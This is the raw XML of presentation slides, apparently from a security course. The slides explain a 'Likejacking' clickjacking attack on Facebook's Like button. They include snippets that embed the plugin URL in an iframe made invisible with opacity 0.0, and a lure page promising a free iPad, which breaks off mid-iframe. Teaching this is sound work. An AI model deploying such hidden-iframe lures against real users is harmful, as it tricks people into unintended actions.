              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="22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149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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Let </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>us </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>consider </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33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website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3500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>need </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>figure out</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-45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within </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>functionality  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>relies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>just one</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-36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click</a:t>
            </a:r>
            <a:endParaRPr sz="24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545"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-70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“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Like</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>” button</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-12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can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-120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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-11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suitable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-14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example</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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209800" y="5867400"/>
            <a:ext cx="1686305" cy="4191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673090" y="5791200"/>
            <a:ext cx="1667255" cy="42900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60</a:t>
            </a:fld>
            <a:endParaRPr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63955" y="781304"/>
            <a:ext cx="87312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5" dirty="0"/>
              <a:t>Creating </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0"/>
              <a:t>a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-15" dirty="0"/>
              <a:t>page </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-30" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-15" dirty="0"/>
              <a:t>Likejacking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-25" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:endParaRPr sz="360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61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93902" y="1808915"/>
            <a:ext cx="7923530" cy="4740275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="4572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36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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>url </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Facebook </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>related </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Like”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-32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button</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="377825" marR="582930" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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378460" algn="l"/>
                <a:tab pos="3957954" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.facebook.com/plugins/like.php?href= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>... e&amp;amp;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>width=450&amp;amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>action=like</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&amp;	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>…  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>colorscheme=light&amp;amp;height=80</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="21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1605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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Place </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>your </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>url </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35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iframe</a:t>
            </a:r>
            <a:endParaRPr sz="24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229"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="69047"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>c="ht</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>p://w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>.facebook.com/plugins/like.php?href=</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1930400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>e&amp;amp;	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>width=450&amp;amp;action=like&amp;</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>…colorscheme=light&amp;amp;height=80"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2100" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="21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1764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75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Now,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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change</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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visibility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level</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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style</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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attribute</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="680085">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>src </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“http:// </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>….” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>style="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>opacity: 0.0;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&gt; ….</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-114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&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="19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770123" y="628904"/>
            <a:ext cx="45199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5" dirty="0"/>
              <a:t>Likejacking </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-10" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993902" y="1581404"/>
            <a:ext cx="8128634" cy="1000125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287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-9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remaining</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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task</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-60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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-145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an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-110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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-70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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-120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allure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-13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one</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-125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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-90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more</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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potential  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>victims </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>click on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-405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message.</a:t>
            </a:r>
            <a:endParaRPr sz="22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215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35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>about offering an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>IPAD </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-31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free??</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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371600" y="2965704"/>
            <a:ext cx="0" cy="3835400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3835400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="383514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44000" y="2965704"/>
            <a:ext cx="0" cy="3835400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3835400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="383514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365503" y="2965450"/>
            <a:ext cx="7785734" cy="12700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7785734" h="12700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="12700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7785354" y="12700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="778535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365503" y="6781800"/>
            <a:ext cx="7785734" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7785734">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7785354" y="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377950" y="2978150"/>
            <a:ext cx="7759700" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0F6FC6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="635" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="62865">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="367665">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;h1&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>CLICK </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>HERE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>TO </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>WIN </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>AN</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-125" dirty="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sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>IPAD&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="921385" marR="570865" indent="-198755">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
